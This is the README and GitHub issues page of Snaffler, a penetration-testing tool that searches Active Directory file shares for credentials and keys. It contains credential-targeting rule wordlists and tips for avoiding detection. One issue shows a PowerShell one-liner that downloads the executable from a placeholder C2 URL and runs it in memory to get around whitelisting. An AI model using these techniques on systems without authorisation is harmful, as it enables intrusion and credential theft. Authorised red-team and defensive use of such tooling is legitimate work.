
snaffler's Introduction

Snaffler


A dictionary definition of "snaffle".

What is it for?

Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an "audit" tool.

I don't want to read all this!!!

Ugh, fine. But we aren't responsible for the results. We wrote all this other stuff for you, but that's okay. We're not mad, just disappointed.

snaffler.exe -s -o snaffler.log

What does it do?

Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.

Then YET MORE snaffly appendages enumerate all the files in those shares and use LEARNED ARTIFACTUAL INTELLIGENCE for MACHINES to figure out which ones a grubby little hacker like you might want.

Actually it doesn't do any ML stuff, because doing that right would require training data, and that would require an enormous amount of time that we don't have. Instead, like all good "ML" projects, it just uses a shitload of if statements and regexen.

What does it look like?

Like this!

How do I use it?

If you "literally just run the EXE on a domain joined machine in the context of a domain user" (as people were instructed to do with Grouper2, immediately before they ran it with all the verbose/debug switches on so it screamed several hundred megabytes of stack traces at them) it will basically do nothing. This is our idea of a prankTM on people who don't read README files, because we're monsters.

HOWEVER... if you add the correct incantations, it will enable the aforementioned L.A.I.M. and the file paths where candy may be found will fall out.

The key incantations are:

-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log

-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.

-v Controls verbosity level, options are Trace (most verbose), Degub (less verbose, less gubs), Info (less verbose still, default), and Data (results only). e.g. -v debug

-m Enables snaffling and assigns an output dir where Snaffler will automatically take a copy of (or Snaffle... if you will) any found files that it likes.

-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.

-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.

-n Disables computer discovery, takes a comma-separated list of hosts to do share and file discovery on.

-y TSV-formats the output.

-b Skips the LAIM rules that will find less-interesting stuff, tune it with a number between 0 and 3.

-f Limits Snaffler to finding file shares via DFS (Distributed File System) - this should be quite a bit sneakier than the default while still covering the biggest file shares in a lot of orgs.

-a Skips file enumeration, just gives you a list of listable shares on the target hosts.

-u Makes Snaffler pull a list of account names from AD, choose the ones that look most-interesting, and then use them in a search rule.

-d Domain to search for computers to search for shares on to search for files in. Easy.

-c Domain controller to query for the list of domain computers.

-r The maximum file size (in bytes) to search inside for interesting strings. Defaults to 500k.

-j How many bytes of context either side of found strings in files to show, e.g. -j 200

-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.

-t Type of log you would like to output. Currently supported options are plain and JSON. Defaults to plain.

-x Max number of threads to use. Don't set it below 4 or shit will break.

-p Path to a directory full of .toml formatted rules. Snaffler will load all of these in place of the default ruleset.
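
Putting a few of those together, a fairly typical run might look something like this (hostnames and paths here are made up, obviously):

snaffler.exe -s -o snaffler.log -v data -m C:\temp\snaffled -n host1.lol.domain,host2.lol.domain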

What does any of this log output mean?

Hopefully this annotated example will help:

This log entry should be read roughly from left to right as:

  • at 7:37ish
  • Snaffler found a file it thinks is worth your attention
  • it's rated it "Red", the second most-interesting level
  • it matched a rule named "KeepConfigRegexRed"
  • you can read it, but not modify it
  • the exact regex that was matched is that stuff in the red box
  • it's 208kB
  • it was last modified on January 10th 2020 at quarter-to-four in the afternoon.
  • the file may be found at the path in purple

... and the rest of the line (in grey) is a little snippet of context from the file where the match was.

In this case we've found ASP.NET validationKey and decryptionKey values, which might let us RCE the web app via some deserialisation hackery. Hooray!

Note: after this screenshot was made, Sh3r4 added a thing to prepend the current user and hostname to each line. I don't wanna redo the screenshot tho.
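
If you can't see the screenshot, a made-up log line matching the annotation above (with the newer user@host prefix) would look roughly like this:

[LAB\jdoe@client1] 2020-01-10 07:37:00Z [File] {Red}<KeepConfigRegexRed|R|validationkey\s*=\s*[\'\"][^\'\"]....|208kB|2020-01-10 15:45:00Z>(\\server1.lab.local\DataShare01\app\web.config) ...<machineKey validationKey="ABC123..." decryptionKey="DEF456..." />...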

How does it decide which files are good and which files are boring?

The "so simple it's almost a lie" answer:

Each L.A.I.M. magic file finding method does stuff like:

  • Searching by exact file extension match, meaning that any file with an extension that matches the relevant wordlist will be returned. This is meant for file extensions that are almost always going to contain candy, e.g. .kdbx, .vmdk, .ppk, etc.

  • Searching by (case insensitive) exact filename match. This is meant for file names that are almost always going to contain candy, e.g. id_rsa, shadow, NTDS.DIT, etc.

  • Searching by exact file extension match (yet another wordlist) FOLLOWED BY 'grepping' the contents of any matching files for certain key words (yet yet another another wordlist). This is meant for file extensions that sometimes contain candy but where you know there's likely to be a bunch of chaff to sift through. For example, web.config will sometimes contain database credentials, but will also often contain boring IIS config nonsense and no passwords. This will (for example) find anything ending in .config, then will grep through it for strings including but not limited to: connectionString, password, PRIVATE KEY, etc.

  • Searching by partial filename match (oh god more wordlists). This is mostly meant to find Jeff's Password File 2019 (Copy).docx or Privileged Access Management System Design - As-Built.docx or whatever, by matching any file where the name contains the substrings passw, handover, secret, secure, as-built, etc.

  • There are also skip-lists to skip all files with certain extensions, or any file with a path containing a given string.

The real answer:

Snaffler uses a system of "classifiers", each of which examines shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.

These rules can be very simple, e.g. "if a file's extension is .kdbx, tell me about it", or "if a path contains windows\sxs then stop looking at subdirectories and files within that path".

Rules can also use regular expressions, which allow for relatively sophisticated pattern-matching. This is particularly useful when examining file contents, although care should be taken to avoid regexen with a significant performance hit. In large environments these rules may be checked literally millions of times, so minor performance issues can be amplified significantly.

The real power is in Snaffler's ability to chain multiple rules together, and even create branching chains. This allows us to use "cheap" rules like checking file names and extensions to decide when to use "expensive" rules like running regexen across the contents of files, parsing certs to see whether they contain private keys, etc. This is what allows Snaffler to achieve quite deep inspection of files where needed, while also being surprisingly fast for a tool written in a higher-level language like C#.

For example, a very simple ruleset might contain:

  • a rule to discard all files with extensions associated with image files
  • a rule to find all files with the .dmp file extension and snaffle them
  • a rule chain (sketched just after this list) where:
    • the first rule looks for files with the .ps1 file extension, and sends all matching files to both the second and third rules.
    • the second rule looks inside files using regexen designed to find hard-coded credentials in PowerShell code.
    • the third rule looks inside files using regexen designed to find hard-coded credentials in cmd.exe commands, as might be found in .bat or .cmd files, as these are also commonly used within PowerShell scripts.
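
To make that concrete, here's a rough sketch of the .ps1 chain in rule form. The rule names and regexen are invented for illustration; the real syntax is covered in the annotated examples further down.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "RelayPs1ByExt"
MatchAction = "Relay"
RelayTargets = ["KeepPsCredRegexRed", "KeepCmdCredRegexRed"] # one matching file gets sent to two downstream rules, i.e. a branching chain
MatchLocation = "FileExtension"
WordListType = "Exact"
WordList = [".ps1"]

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepPsCredRegexRed"
MatchAction = "Snaffle"
MatchLocation = "FileContentAsString"
WordListType = "Regex"
WordList = ["ConvertTo-SecureString .{0,200}-AsPlainText"] # illustrative regex only
Triage = "Red"

# KeepCmdCredRegexRed would look just like the rule above, only with cmd.exe-flavoured regexen in the WordList.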

This approach also lets us maintain a relatively manageable and legible ruleset, and makes it much easier for the end-user (you) to customise the defaults or develop your own rulesets.

I don't want to write rules, that sounds hard and boring.

You're right, it was.

Snaffler comes with a set of default rules baked into the .exe. You can see them in ./Snaffler/SnaffRules/DefaultRules.

I am a mighty titan of tedium, a master of the mundane, I wish to write my own ruleset.

No problem, you enormous weirdo. You have 2 options.

  1. Edit or replace the rules in the DefaultRules directory, then build a fresh Snaffler. The .toml files in that dir will get baked into the .exe as resources, and loaded up at runtime whenever you don't specify any other rules to use.
  2. Make a directory and stick a bunch of your own rule files in there, then run Snaffler with -p .\path\to\rules. Snaffler will parse all the .toml files in that directory and use the resulting ruleset. This will also work if you just have them all in one big .toml file.

Here are some annotated examples that will hopefully help to explain things better. If this seems very hard, you can just use our rules and they'll probably find you some good stuff.

This is an example of a rule that will make Snaffler ignore all files and subdirectories below a dir with a certain name.

[[ClassifierRules]]
EnumerationScope = "DirectoryEnumeration" # This defines which phase of the discovery process we're going to apply the rule. 
                                          # In this case, we're looking at directories. 
                                          # Valid values include ShareEnumeration, DirectoryEnumeration, FileEnumeration, ContentsEnumeration
RuleName = "DiscardLargeFalsePosDirs" # This can be whatever you want. We've been following a rough naming scheme, but you can call it "Stinky" if you want. ¯\_(ツ)_/¯
MatchAction = "Discard"# What to do with things that match the rule. In this case, we want to discard anything that matches this rule.
                        # Valid options include: Snaffle (keep), Discard, Relay (example of this below), and CheckForKeys (example below)
Description = "File paths that will be skipped entirely." # Not used in the code, just a place for notes really.
MatchLocation = "FilePath" # What part of the file/dir/share to look at to check for a match. In this case we're looking at the whole path.
                           # Valid options include: ShareName, FilePath, FileName, FileExtension, FileContentAsString, FileContentAsBytes,
                           # although obviously not all of these will apply in all EnumerationScopes.
WordListType = "Contains" # What matching logic to apply, valid options are: Exact, Contains, EndsWith, StartsWith, or Regex.
                          # Under the hood these all get turned into regexen one way or another.
MatchLength = 0
WordList = [ 
  # A list of strings or regex patterns to use to match. If using regex patterns, WordListType must be Regex.
	"\\\\puppet\\\\share\\\\doc",
	"\\\\lib\\\\ruby",
	"\\\\lib\\\\site-packages",
	"\\\\usr\\\\share\\\\doc",
	"node_modules",
	"vendor\\\\bundle",
	"vendor\\\\cache",
	"\\\\doc\\\\openssl",
	"Anaconda3\\\\Lib\\\\test",
	"WindowsPowerShell\\\\Modules",
	"Python27\\\\Lib"
]
Triage = "Green" # If we find a match, what severity rating should we give it. Valid values are Black, Red, Yellow, Green. This value is ignored for Discard MatchActions.

This rule on the other hand will look at file extensions, and immediately discard any we don't like.

In this case I'm mostly throwing away fonts, images, CSS, etc.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # We're looking at the actual files, not the shares or dirs or whatever.
RuleName = "DiscardExtExact" # just a name
MatchAction = "Discard" # We're discarding these
MatchLocation = "FileExtension" # This time we're only looking at the file extension part of the file's name.
WordListType = "Exact" # and we only want exact matches. 
WordList = [".bmp", ".eps", ".gif", ".ico", ".jfi", ".jfif", ".jif", ".jpe", ".jpeg", ".jpg", ".png", ".psd", ".svg", ".tif", ".tiff", ".webp", ".xcf", ".ttf", ".otf", ".lock", ".css", ".less"] # list of file extensions.

Here's an example of a really simple rule for stuff we like and want to keep.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # Still looking at files
RuleName = "KeepExtExactBlack" # Just a name
MatchAction = "Snaffle" # This time we are 'snaffling' these. This usually just means send it to the output, 
                       # but if you turn on the appropriate option it will also grab a copy.
MatchLocation = "FileExtension" # We're looking at file extensions again
WordListType = "Exact" # With Exact Matches
WordList = [".kdbx", ".kdb", ".ppk", ".vmdk", ".vhdx", ".ova", ".ovf", ".psafe3", ".cscfg", ".kwallet", ".tblk", ".ovpn", ".mdf", ".sdf", ".sqldump"] # and a bunch of fun file extensions.
Triage = "Black" # these are all big wins if we find them, so we're giving them the most severe rating.

This one is basically the same, but we're looking at the whole file name. Simple!

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepFilenameExactBlack"
MatchAction = "Snaffle"
MatchLocation = "FileName"
WordListType = "Exact"
WordList = ["id_rsa", "id_dsa", "NTDS.DIT", "shadow", "pwd.db", "passwd"]
Triage = "Black"

This one is a bit nifty, check this out...

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # we're looking for files...
RuleName = "KeepCertContainsPrivKeyRed" 
MatchLocation = "FileExtension" # specifically, ones with certain file extensions...
WordListType = "Exact"
WordList = [".der", ".pfx"] # specifically these ones...
MatchAction = "CheckForKeys" # and any that we find, we're going to parse them as x509 certs, and see if the file includes a private key!
Triage = "Red" # cert files aren't very sexy, and you'll get huge numbers of them in most wintel environments, but this check gives us a way better SNR!

OK, here's where the powerful stuff comes in. We got a pair of rules in a chain here.

Files with extensions that match the first rule will be sent to second rule, which will "grep" (i.e. String.Contains()) them for stuff in a specific wordlist.

You can chain these together as much as you like, although I imagine you'll start to see some performance problems if you get too inception-y with it.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration" # this one looks at files...
RuleName = "ConfigGrepExtExact"
MatchLocation = "FileExtension" # specifically the extensions...
WordListType = "Exact"
WordList = [".yaml", ".xml", ".json", ".config", ".ini", ".inf", ".cnf", ".conf"] # these ones.
MatchAction = "Relay" # Then any files that match are handed downstream...
RelayTargets = ["KeepConfigGrepContainsRed"] # To the rule with this RuleName! This can also be an array of RuleNames if you want to get real wild and start writing branching rulesets.

[[ClassifierRules]]
RuleName = "KeepConfigGrepContainsRed" # Anyway, this is the target rule. Following a naming convention really helps to make sure you're using the right targets.
EnumerationScope = "ContentsEnumeration" # this one looks at file content!
MatchAction = "Snaffle" # it keeps files that match
MatchLocation = "FileContentAsString" # it's looking at the contents as a string (rather than a byte array)
WordListType = "Contains" # it's using simple matching
WordList = ["password=", " connectionString=\"", "sqlConnectionString=\"", "validationKey=", "decryptionKey=", "NVRAM config last updated"]
Triage = "Red"

Hopefully this conveys the idea. I'd recommend taking some of the default rules and tinkering with them until you feel like you've got a good handle on it.

WTF is an "UltraSnaffler"???

A lot of people wanted the ability to look inside file formats that weren't just flat text, like Word documents, PDFs, .eml, etc. Unfortunately, the easiest library for implementing that functionality blew out the final file size on Snaffler.exe by about 1200%, which sucked for a bunch of the popular in-memory execution techniques that had upper limits on how big a file they could be used with.

The solution was UltraSnaffler, which is just a second .sln file that enables the required lib and the relevant code. Build UltraSnaffler.sln, get UltraSnaffler.
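
Something like this from a Developer Command Prompt should do the trick (just a sketch, assuming MSBuild is on your PATH and you've restored the NuGet packages):

msbuild .\UltraSnaffler.sln /p:Configuration=Release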

WARNING: Snaffler's default rules don't include any that will look inside Office docs or PDFs, because we found it really difficult to write any that weren't going to just take years to finish a run in a typical corporate environment. Be warned, looking inside these docs is a lot slower than looking inside good old fashioned text files, and a typical environment will have an absolute mountain of low-value Office docs and PDFs.

How does the config file thing work?

This is actually really neat IMO.

If you add -z generate onto the end of a Snaffler command line, Snaffler will serialise the configuration object (including whatever aspects of the configuration were set by your args) into a .toml config file, which you can then hand-edit pretty easily (or not) and re-use at your leisure.

For example, if you do:

Snaffler.exe -s -o C:\mydir\snaffler.log -v trace -i \\host.lol.domain\share -p C:\users\someguy\myrules -z generate

Snaffler will parse all your many, many arguments, turn them into a config object, and serialise that config object into the following .toml config file:

PathTargets = ["\\\\host.lol.domain\\share"]
ComputerTargetsLdapFilter = "(objectClass=computer)"
ScanSysvol = true
ScanNetlogon = true
ScanFoundShares = true
InterestLevel = 0
DfsOnly = false
DfsShareDiscovery = false
DfsNamespacePaths = []
CurrentUser = "l0sslab\\l0ss"
RuleDir = "C:\\users\\someguy\\myrules"
MaxThreads = 60
ShareThreads = 20
TreeThreads = 20
FileThreads = 20
MaxFileQueue = 200000
MaxTreeQueue = 0
MaxShareQueue = 0
LogToFile = true
LogFilePath = "C:\\mydir\\snaffler.log"
LogType = "Plain"
LogTSV = false
Separator = 32
LogToConsole = true
LogLevelString = "trace"
ShareFinderEnabled = false
LogDeniedShares = false
DomainUserRules = false
DomainUserMinLen = 6
DomainUserNameFormats = ["sAMAccountName"]
DomainUserMatchStrings = ["sql", "svc", "service", "backup", "ccm", "scom", "opsmgr", "adm", "adcs", "MSOL", "adsync", "thycotic", "secretserver", "cyberark", "configmgr"]
DomainUsersWordlistRules = ["KeepConfigRegexRed"]
MaxSizeToGrep = 1000000
Snaffle = false
MaxSizeToSnaffle = 10000000
MatchContextBytes = 200

You may notice that there are many items in here that you didn't pass arguments for. Those values are the default config items, some of which can only be edited easily in the source or via a config file, usually because it didn't seem worth it to add an argument for them.
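
Once you've got a config file you're happy with, just point -z at it on subsequent runs, e.g.:

snaffler.exe -z .\default.toml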

This sucks, do you have plans to make it suck less?

No it doesn't, you suck.

Also, yes we do.

We're also going to:

  • Add parsing of archive files, ideally treating them as just another dir to walk through looking for goodies.
  • Keep refining the rules and regexen. More words for the wordlists! string[]s for the string throne!

A dumb joke about wordlists.

Who did you steal code from?

The share enumeration bits were snaffled (see what I did there?) from SharpShares, which was written by the exceedingly useful Dwight Hohnstein. (https://github.com/djhohnstein/SharpShares/) Dwight's GitHub profile is like that amazing back aisle at a hardware store that has a whole bunch of tools that make you go "oh man I can't wait til I have an excuse to try this one for realsies..." and you should definitely check it out.

While no code was taken (mainly cos it's Ruby lol), we did steal a bunch of nifty ideas from plunder2 (http://joshstone.us/plunder2/).

Wordlists were also curated from those found in some other similar-ish tools like trufflehog, shhgit, gitrobber, and graudit.

Is it OPSEC safe? (Whatever the hell that means)

Pffft, no. It's noisy as fuck.

Look let's put it this way... If it's the kind of environment where you'd feel confident running BloodHound in its default mode, then uhhh, yeah man... It's real stealthy.

I thought you used this thing on red team gigs?

sigh

OK, I'll give you the real answer.

In default mode, Snaffler looks an awful lot like SharpHound, in a lot of ways. It talks a bunch of LDAP to AD, then it goes out and tries to talk SMB to every Windows machine in the domain. This kind of behaviour is pretty much guaranteed to get you busted in an org that has their shit even slightly together.

HOWEVER...

Snaffler's more-targeted options (especially -i) are a lot less likely to trigger detections.

I am particularly fond of running Snaffler.exe -s -i C:\ on a freshly compromised server or workstation, and I've not seen this behaviour get detected.

Yet.

How can I help or get help?

If you want to discuss via Slack you can ping us (@l0ss or @Sh3r4) on the BloodHound Slack, joinable at https://bloodhoundgang.herokuapp.com/, or chat with a group of contributors in the #snaffler channel.

You can also ping us on Twitter - @mikeloss and @sh3r4_hax

Otherwise file an issue; we'll try.

snaffler's People

Contributors

adindrabkin, carlmon, cmprmsd, coj337, coj337-ccx, hackndo, hkelley, jlyngcoln, jonasw234, korving-f, l0ss, l0ss2, legendoflynkle, nheiniger, omnifocal, sh3r4, smashery, ville87


snaffler's Issues

Parsing logs

Has anybody written a log parser? Adversarial/red users can possibly get by with a visual scan of the Snaffler log to get what they need. Defenders, especially in environments with hundreds of servers, need to be able to get the Snaffler log into analysis tools to properly review all of the data.

I've started working on parsing in Powershell but I'd appreciate a pointer if anybody has already covered this ground.

param
(    
    [Parameter(Mandatory = $true)] [string] $SnafflerLog
)

$fileItem = Get-Item $SnafflerLog

$reader = New-Object -TypeName System.IO.StreamReader -ArgumentList $fileItem

$pattern = '(?smi)(?<date>.*?) \[(?<type>.+?)\]\s+\{(?<level>.+?)\}\<*(?<rule>.*?)\>*\((?<path>\\\\.+?)\)(?<matched_string>.*)'
$lineRegex = [regex] $pattern

$lineNum = 0

while ($line = $reader.ReadLine() ) 
{   
    $lineNum++ 

    if ($line -match $lineRegex ) 
    {
        # Rules can have unescaped pipes in the regexes so we can't pluck those out (easily) with other regexes
        #   <KeepConfigRegexRed|R|CREATE (USER|LOGIN) .{0,200} (IDENTIFIED BY|WITH PASSWORD)|4.2kB|27/02/2014 13:44:25>
        # Therefore, we have to nibble our data from both ends of the split array and treat all elements that remain in the middle as the pattern match

        $ruleParts = $Matches.rule.Trim() -split '\|'
        $endOfMatchedRegex = $ruleParts.count-3
        $matched_rule = $ruleParts[0]
        $access_level = $ruleParts[1]
        $matched_regex = ($ruleParts[2..$endOfMatchedRegex] -join "|")
        $last_modified = $ruleParts[-1]

        $path = $Matches.path.Trim()
        $type = $Matches.type.Trim()

        $path_parts = $path -split '\\'
        $server =  $path_parts[2]
        $share =   $path_parts[3]
        if($type -eq "file")
        {
            $extension =  ($path_parts[-1] -split "\.")[-1]
        }
        else
        {
            $extension = $null
        }
        
        [pscustomobject] @{
            level = $Matches.level.Trim()
            type = $Matches.type.Trim()
            path = $path
            server = $server
            share = $share
            extension = $extension
            matched_rule = $matched_rule
            access_level = $access_level
            matched_regex = $matched_regex
            last_modified = $last_modified
            matched_string = $Matches.matched_string.Trim()
            log_line_num = $lineNum
        }            
    }
    else
    {
        
#       Handle multi-line records
    }
}
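
For anyone wanting to try it, usage would be something like this, assuming the script above is saved as Parse-SnafflerLog.ps1 (name invented):

.\Parse-SnafflerLog.ps1 -SnafflerLog .\snaffler.log | Export-Csv .\snaffler-parsed.csv -NoTypeInformation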

Running snaffler with custom toml file and parameters

Hello there,

first of all: thanks for your work on this great tool! :)

I'm in a scenario where I'd like to add some custom search patterns via a toml file, but only search in a custom path.
I realized that once you define a toml file with the -z, all other parameters seem to be ignored. (I wanted to add "-i D:\somefolder\path")

Is this by design, that it ignores other parameters? If yes, how can I define a custom search path in the toml file?

Thanks,
Ville

Negative searching for exact file name/folder matches

Hello again!
So my scenario currently is this:
After logging in to a couple of boxes, I realise that while they are all supposed to have 'Generic EDR', a few hosts do not.

There's a few ways to go about generating a list of hosts that do not have 'Generic EDR' installed, but the easiest way to check would be to simply look for the presence of the folder/files located at C:\program files\GenericEDR\ or C:\program files\GenericEDR\genericedr.exe.

What I'd like to be able to do is generate a list of hosts using snaffler that do not have this folder or file present and then I can target those specifically for further testing. In this use case, no other files or folders would need to be searched for or reported on (ie, the usual file searches need not apply). If a full path is specified C:\program files\GenericEDR\ then it only needs to check for the presence/absence of that specific path. If only a file name is specified like genericedr.exe then the whole system can be scanned for it and the full path it was found in can be listed as well.

Would this be something that could be added?

Many thanks!

Missing matchcontext data in TSV mode on ACLcrimes branch

Please update line 59 of SnaffleRunner.cs to include element 9.

Options.Separator + "{4}" + Options.Separator + "{5}" + Options.Separator + "{6:u}" + Options.Separator + "{7}" + Options.Separator + "{8}" + Options.Separator + "{9}";

Feature Request - HTML report

I took a quick look at the code to see if, for example, an HTML report can be generated as output instead of the text-only log. Seems that the output is not generated at a single point in the code but from different modules at run time, am I right?

I'm missing some output format like HTML here, where the links can be clicked and the colours still remain. This would really improve the usability when running the tool in the background.

Greetings

Permission errors should not be shown to users if a folder/file is not readable

I expect Snaffler to silently ignore errors related to not being able to read a particular file/folder, however, I received this error when running:

[REDACTED\ss23@REDACTED] 2021-09-21 13:14:16Z [Error] System.UnauthorizedAccessException: (5) Access is denied: [\\?\UNC\REDACTED\REDACTED$]
   at Alphaleonis.Win32.NativeError.ThrowException(UInt32 errorCode, String readPath, String writePath)
   at Alphaleonis.Win32.Filesystem.File.CreateFileCore(KernelTransaction transaction, String path, ExtendedFileAttributes attributes, FileSecurity fileSecurity, FileMode fileMode, FileSystemRights fileSystemRights, FileShare fileShare, Boolean checkPath, PathFormat pathFormat)
   at Alphaleonis.Win32.Filesystem.File.GetAccessControlCore[T](Boolean isFolder, String path, AccessControlSections includeSections, PathFormat pathFormat)
   at Alphaleonis.Win32.Filesystem.DirectoryInfo.GetAccessControl(AccessControlSections includeSections)
   at SnaffCore.Classifiers.EffectiveAccess.FileSystemSecurity2..ctor(FileSystemInfo item) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 708
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 88
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.CanRw(FileSystemInfo filesysInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 39

Add flag/config for "lastModifiedWithin"

It'd be nice to have a config item to only pilfer files e.g. last modified in the last 4 years, which will help reduce noise from creds that have since been rolled.

It could very well already exist, but I don't see such an option in the README/sample config.

Feature Request: Snaffler rga integration for office docs and PDFs

Hey there,

Awesome tool you created there!

Parsing of Office docs and PDFs seems to be a whole new topic in itself, and I wonder if you would find it interesting to integrate ripgrep-all (rga) into Snaffler.
The tool parses many filetypes for their content. It is written in Rust, but it still might be worth a shot, as I see the plan in your to-do list 😁

Specify targets by IP ranges

My understanding is that -n expects a comma-separated list of hostnames or IP addresses. Could you add an option to define targets (scope) by IP ranges in CIDR notation, with the possibility to exclude certain IP addresses or subranges via another optional argument?

Misconfigured file ClassifierRule

Hi,
I've got an issue: the exe works perfectly, but here is what it prints:
Screenshot 2023-06-12 151932

I've tried to recompile the exe myself just in case, but it's still the same.
I have to say that the scan works, it's just that those errors pop up and flood my screen.

Snaffler doesn't write log file when executed reflectively

Heya,

I'm on a gig where the client has whitelisting enabled but hasn't locked down PowerShell. So while I can't run the Snaffler executable directly, I can just run it reflectively through PowerShell:

$bytes = IEX (New-Object Net.WebClient).DownloadData("https://myc2url/snaffler.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$vars = New-Object System.Collections.Generic.List[System.Object]
$vars.Add("-s")
$vars.Add("-o")
$vars.Add("snaffler.log")
$passed = [string[]]$vars.ToArray()
$asm.EntryPoint.Invoke($null, @(,$passed))

Now Snaffler itself works perfectly like this; however, for some reason the log file never gets written to disk (even though I did specify the -o snaffler.log argument).

The arguments seem to be parsed successfully, because if I remove the -s option I don't get any console output.

Is this something you've tried and/or is it a limitation on the Snaffler logger?

Thanks

DomainUserRules don't fire if ComputerTargets is specified

I would like to use the DomainUsers discovery but this means I either need to:

a) Split the disco routine for computers/DFS out from users - and then create separate config options for each. This would allow ComputerTargets to be defined but dynamically discover usernames.
or
b) add an LDAP filter to the computer search so that I can use DomainDisco but select targets

I use option B today, in a roundabout way. Before I scan, I search AD for computers based on an LDAP filter. Then I edit the TOML file before I scan. This filtering is important (to me only?) because scanning servers is useful. Scanning workstations has a much higher noise:signal ratio.

Two questions:

  1. Which approach do you think is more generally useful?
  2. Should I bundle any change in the PR I'm already doing for denied share logging, or break it up into two?

Output Files are not UTF-8 encoded

Currently the log-files that Snaffler outputs are ANSI encoded. However, at least VSCode opens the file with UTF-8 encoding and misses e.g. German umlauts:

image

Currently I work around this issue by clicking on UTF-8 and "Reopen the document" with Western (ISO 8859-1) encoding in order to see the umlauts correctly.

I guess this issue is even more visible for other languages 😅

Btw: Rainbow CSV for VSCode is awesome to view the tool output!

Any examples of cascading relays ?

I'm trying to finesse the connection string rules so that those with Integrated Auth are triaged at Yellow and all others (presuming they will have SQL passwords) are Red.

I tried the following (multiple rules, same name, hoping the relay might call each). No dice. Only one rule seems to survive.

Any other tricks?

# Need this relay to hook the next rule
[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "ConfigContentByExt"
MatchAction = "Relay"
RelayTarget = "KeepConfigRegexXXXX"
Description = "Files with these extensions will be subjected to a generic search for keys and such."
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = [ ".json", ".config"]
Triage = "Green"

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexXXXX"
MatchAction = "Snaffle"
Description = "Match SQL connection strings that appear to have a password."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["Data Source=.+Password=.+"]
Triage = "Red"

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexXXXX"
MatchAction = "Snaffle"
Description = "Match SQL connection strings that appear to use integrated security (so no passwords)."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["Data Source=.+Integrated Security=true"]
Triage = "Yellow"

Execute Snaffler from Non-Domain Joined Computer

Hi,
I recently tried Snaffler, but I used it on a non-domain-joined computer where I was logged in using an Azure account. I had a VPN connection, so the DC was reachable. However, it was not working properly. I tried executing it via a runas /netonly command prompt, but it still did not work. I did not find any parameter like --ldapusername --ldappassword.

Will there be support in the future to be able to provide a custom domain / credentials to execute snaffler from a non-domain joined computer?

Compilation of Ultrasnaffler does not work

Hey Mike,

I'm having some trouble compiling the code for UltraSnaffler.

I get an error for missing assembly references on:

using SnaffCore.Classifiers

There is also "Snaffcore.dll not found."

This is what I get when I run "create project", or "Projektmappe" as it's called in German VS 🤣

Snaffler builds fine with the Snaffler solution file, but I cannot get it built with UltraSnaffler.sln

Latest Release not finding relevant files or content?

I used Snaffler today (latest release, version 1.0.135) to test something and realized that it doesn't find anything on a target share...
For testing purposes, I created an SMB share on a server, added some test files (including the testfiles from the Snaffler repository in snafflertest/bait/winsxs and snafflertest/dir) and ran Snaffler as follows:

PS C:\_Data\excluded> .\Snaffler.exe -i \\server1.lab.local\DataShare01 -s -o C:\_Data\excluded\snaffout.log -v trace
 .::::::.:::.    :::.  :::.    .-:::::'.-:::::':::    .,:::::: :::::::..
;;;`    ``;;;;,  `;;;  ;;`;;   ;;;'''' ;;;'''' ;;;    ;;;;'''' ;;;;``;;;;
'[==/[[[[, [[[[[. '[[ ,[[ '[[, [[[,,== [[[,,== [[[     [[cccc   [[[,/[[['
  '''    $ $$$ 'Y$c$$c$$$cc$$$c`$$$'`` `$$$'`` $$'     $$""   $$$$$$c
 88b    dP 888    Y88 888   888,888     888   o88oo,.__888oo,__ 888b '88bo,
  'YMmMY'  MMM     YM YMM   ''` 'MM,    'MM,  ''''YUMMM''''YUMMMMMMM   'W'
                         by l0ss and Sh3r4 - github.com/SnaffCon/Snaffler


\\server1.lab.local\DataShare01

[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Info] Parsing args...
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Logging to file at C:\_Data\excluded\snaffout.log
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Requested verbosity level: trace
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Enabled logging to stdout.
